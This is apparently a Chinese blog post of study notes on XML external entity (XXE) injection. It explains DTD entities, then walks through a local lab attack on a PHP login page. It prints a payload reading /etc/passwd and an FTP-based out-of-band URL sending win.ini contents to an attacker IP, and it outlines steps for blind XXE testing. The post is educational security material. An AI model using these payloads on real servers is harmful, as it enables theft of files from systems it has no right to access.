XXE外部实体注入漏洞 学习笔记

最新推荐文章于 2024-05-19 22:38:58 发布
最新推荐文章于 2024-05-19 22:38:58 发布
阅读量1.7k 收藏 5
点赞数 1
分类专栏: web安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37019068/article/details/120716992
版权

1. 前置知识——XML 与 DTD

名词解释

XML:指可扩展标记语言(eXtensible Markup Language)。被设计用来传输和存储数据,形似HTML,但是与其不同的是HTML被设计用于展示数据

DTD:文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。
DTD可被成行地声明于 XML 文档中,也可作为一个外部引用。
DTD可被内部引用,也可以被外部引用

举例

XML内部引入DTD,即将约束规则限定在xml文档中

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [<!--定义此文档是 note 类型的文档-->
	<!ELEMENT note (to,from,heading,body)><!--定义note元素有四个元素-->
	<!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型-->
	<!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型-->
	<!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型-->
	<!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->
]>
<note>
	<to>Y0u</to>
	<from>@re</from>
	<head>v3ry</head>
	<body>g00d!</body>
</note>

外部的DTD引入:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root-element SYSTEM "http://192.168.x.x/ext.dtd">
<note>
	<to>Y0u</to>
	<from>@re</from>
	<head>v3ry</head>
	<body>g00d!</body>
</note>

DTD实体

实体是对特殊字符或普通文本的快捷引用
实体可在内部或外部进行声明

一般实体
一般实体的声明:<!ENTITY 实体名称 "实体内容">
引用一般实体的方法:&实体名称;
一般实体可以在DTD中引用,可以在XML中引用,可以在声明前引用,还可以在实体声明内部引用
参数实体
参数实体的声明:<!ENTITY % 实体名称 "实体内容">
引用参数实体的方法:%实体名称;
参数实体只能在DTD中引用,不能在声明前引用,也不能在实体声明内部引用。
内部实体
<!ENTITY 实体名称 "实体的值">

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE test [
	<!ENTITY writer "Dawn">
	<!ENTITY copyright "Copyright W3School.com.cn">
]>
<test>&writer;©right;</test>
外部实体
外部实体用来引入外部资源。有SYSTEM 和 PUBLIC 两个关键字,表示实体来自本地计算机或者是公共计算机
<!ENTITY 实体名称 SYSTEM "URI/URL"> 或者 <!ENTITY 实体名称 PUBLIC "public_ID" "URI">

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE test [
	<!ENTITY file SYSTEM "file:///etc/passwd">
	<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
]>
<author>&file;©right;</author>

DTD实体的元素类型

  1. PCDATA
    PCDATA是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理,而实体会被展开。
    被解析的字符数据不应当包含任何&,<,或者>字符,需要用 &amp; &lt; &gt; 实体来分别替换

  2. CDATA
    意思是字符数据,CDATA 是不会被解析器解析的文本,在这些文本中的标签不会被当作标记来对待,其中的实体也不会被展开。

  3. ANY
    带有任何内容的元素

外部实体的支持协议

根据不同语言的页面,外部实体支持的协议会有不同
具体如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Md3l9onf-1634002278607)(/images/1/20/DTD实体协议.png)]

2. XXE注入

XXE(XML External Entity Injection) xml外部实体注入

该漏洞一般发生在xml文件解析处,加载xml时没有禁止外部实体或对xml文件进行检查的话,就可能造成XXE注入,可能造成任意文件读取、命令执行、内网端口扫描、内网网站被攻击、Dos攻击等危害

三种类型的XXE注入

  1. 基础的XXE注入 - 外部实体注入本地DTD
    形如:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<! ENTITY xxx SYSTEM "file:///etc/passwd">]>
<xxe><e1>&xxe;(此处就是注入的地方)</e1><e2>xxxxxxxx</e2></xxe>

即可以修改请求内容让服务端处理后展示的XXE注入,会返回/etc/passwd中的内容

  1. 基于盲注的XXE注入 - XML解析器在响应中不显示任何错误
    原理: 就是建立一条带外信道提取数据,利用外部实体中的URL发出访问,与攻击者主机建立联系,从而达到数据的读取
  2. 基于错误的XXE注入 - 成功解析之后,XML解析器始终显示SAME响应。
    (即“您的消息已被接收”),因此,我们可能希望解析器将文件的内容“打印”到错误响应中

简单实验分析

环境

xxe-lab(包含各种语言版本的XXE漏洞Demo)
xxer(提供外部实体服务)
PHPStudy-开启PHP+apache页面

步骤 & 逐步分析

  1. 靶机开启PHPStudy,此时会快速开启WAMP环境

  2. 进入D:\phpStudy\PHPTutorial\WWW(即PHPStudy存储路径),将xxe-lab中的php_xxe文件夹放入
    在这里插入图片描述

  3. 此时,访问http://your-ip/php_xxe/index.html 可以看到一个登陆页面
    在这里插入图片描述

  4. 输入登录信息,通过BurpSuite抓包可以看出,用户名和密码是通过xml进行传输的
    在这里插入图片描述
    在这里插入图片描述

  5. 尝试进行基础的XXE注入,Repeat发送如下数据包
    在这里插入图片描述
    发现注入的实体可被解析,我们获得了C:/windows/win.ini的文件内容

  6. 我们看看这个页面的源码
    在这里插入图片描述
    即我们的注入点为 username标签,将包含信息的实体注入后可解析返回内容

  7. 我们增加一点难度,改成无回显的,修改源码如下:
    在这里插入图片描述

  8. 这时,我们无法得知xml是否被正确解析,因为不管是正常解析或是未被解析,都无法返回信息。
    以下是无法解析xml的源码
    在这里插入图片描述
    返回结果
    在这里插入图片描述

  9. 此时我们可以通过外部服务器,根据请求信息判断是否存在外部实体解析,如果存在外部实体解析,说明可能存在xxe注入

  10. 开启xxer
    在这里插入图片描述

  11. 发送如下payload,查看xxer的结果
    在这里插入图片描述

    查看xxer的信息
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vwFde29G-1634002278622)(/images/1/20/xxer证明外部实体解析.png)]
    解释:xxer看到请求的结果,即说明我们发送的实体被解析,而被解析的实体会访问xxer目录下的1.txt,所以xxer看到请求说明实体可被解析。

  12. 既然如此,我们可尝试blind_xxe进行盲注,看看是否可以成功,payload如下
    在这里插入图片描述
    可以看出,盲注成功,我们成功获取了win.ini的内容
    解释:
    1.由于外部实体可被解析,所以我们构造一个外部实体,让页面解析xml后访问该外部实体,ext.dtd文件内容如下
    在这里插入图片描述
    2.由于我们使用了参数实体的内部调用,页面解析实体的时候,首先会解析%xx,访问ext.dtd
    3.其次解析%ccc,即解析出 <!ENTITY % ddd SYSTEM ...> 这个实体
    4.再次解析%ddd,这样解析出访问文件

ftp://fakeuser:file:///C:/windows/win.ini;@192.168.25.220/b

尝试连接ftp服务器失败,内容会从中返回

3. 总结与问答

Q:为什么要使用远程加载DTD实体?
A:为了控制注入的参数,或是盲注时判断页面是否可以解析外部实体

容易存在XXE的地方:

  1. 基于XML的RPC服务或基于SOAP的WebService
  2. 开发框架的对Content-Type只能识别导致的xxe
  3. 使用SAML的登录接口
  4. 解析DOCX文件

思路:

  1. POST一个XML请求,看出错或是正常解析
  2. 尝试是否可以外部实体引用
  3. 有些情况在POST中会看到一些XML文档元素,尝试对这些文档元素修改,查看其是否可控。如果可控可以尝试外部实体控制
  4. 针对无回显的情况(报错页面出现xml解析器,或者出现一些空白页面和报错出现绝对路径等)
    1. 向存在可控参数的地方注入一条像自己服务器发送请求的xml代码,查看服务器,如果请求成功说明可引入外部实体
    2. 或者使用参数实体请求
  5. 如果存在外部实体引入,那么很可能存在XXE注入,因为他是无回显的,所以通过blind xxe达到攻击效果
  6. blind xxe 返回的建立通道的方法有多种,如ftp报错返回等等
1A_
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
2020第五空间 web writeup
a3320315的博客
06-27 3338
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2294
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
34-XXE(XML外部实体注入
最新发布
XLbb的博客
05-19 907
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
第四届2021美团网络安全 MT-CTF writeup
qq_45603443的博客
01-11 3501
第四届2021美团网络安全 MT-CTF writeupWebUPstorageMiscUn(ix)zipReverserandomCryptohamburgerRSASymbolPwnbabyropblindboxbookshop重点来了 Web UPstorage 需要先xxe读session 找到ip,然后直接phar。 <?php abstract class Users { public $db; abstract public function verify_user($usernam
XXE漏洞漏洞及利用方法解析
weixin_43749601的博客
03-02 2410
XXE(XML External Entity Injection)即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。 0x001 XML XML设计用来传送及携带数据信息,不用来表现或展示数据,HTML则用来表现数据,所以XML用途的焦点是它说明数据是什么,以
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体是 XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
无胁科技-TVD每日漏洞情报-2022-7-29
wuthreat无胁科技的博客
07-29 544
漏洞名称:万户OA前台无条件GETSHELL 漏洞级别:无 漏洞编号:无 相关涉及:万户OA 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-15480漏洞名称:用友U8-OA企业版存在SQL注入漏洞(CNVD-2022-31182) 漏洞级别:无 漏洞编号:CNVD-2022-31182 相关涉及:用友网络科技股份有限公司 用友U8-OA企业版 2.83 漏洞状态:在野 参考链接:https://tvd.wuthrea
XXE漏洞
weixin_40950781的博客
09-11 1112
XXE漏洞学习0x00 XXE漏洞简介0x01 XML基础知识0x02 DTD内外部引用1. 内部引用:2. 外部引用:3. 参数化外部引用:0x03 XEE攻击思路0x04 XEE漏洞利用实验一:有回显读本地敏感文件(Normal XXE)实验二:无回显读取本地敏感文件(Blind OOB XXE)实验三 XEE的基本利用实验四 Blind OOB XXE场景1-端口扫描场景2-通过DTD窃取文...
XXE(外部实体注入)详解
2401_82576671的博客
01-23 1836
​ 应用程序在解析XML时没有过滤外部实体的加载,导致加载了恶意的外部文件,造成执行命令、读取文件、扫描内网、攻击内网等危害。​ 运维人员使用了低版本的php,libxml低于2.9.1或者设置了libxml_disable_entity_loader(False)就可以加载外部实体。将文档类型直接放入XML文档中,称为内部定义。内部定义格式:<!DOMCTYPE 根元素 [元素声明]>DOCTYPE note[ #定义跟根节点。
xxe漏洞浅谈以及复现
weixin_51692662的博客
10-18 1946
xxe
P4 利用XXE靶机 -XXE(XML外部实体注入漏洞)复现
在下小黄的博客
03-22 558
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P3 利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞 往期检索:程序设计学习笔记——目录 创建时间:2021年3月22日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、XXE靶机 XXE漏洞复现环境准备 环境准备 kali配置 安装masscan : apt-get install masscan 安装gobuster: apt-g
xxe简单漏洞复现
西部壮仔的博客
05-25 849
xml初识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 漏洞复现 php代码: <?php $xml = file_get_contents("php://input"); $data = simplexml_load_string($xml); echo "<pre>"; print_r($data); //注释掉该语句即为无回显的情
xxe漏洞原理和案例实验演示
北冥有鱼
05-30 1224
什么是xml? xml一般指可扩展标记语言 可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构...
XXE xml注入漏洞 入门
weixin_51458899的博客
02-17 2107
xxe 入门
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1A_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值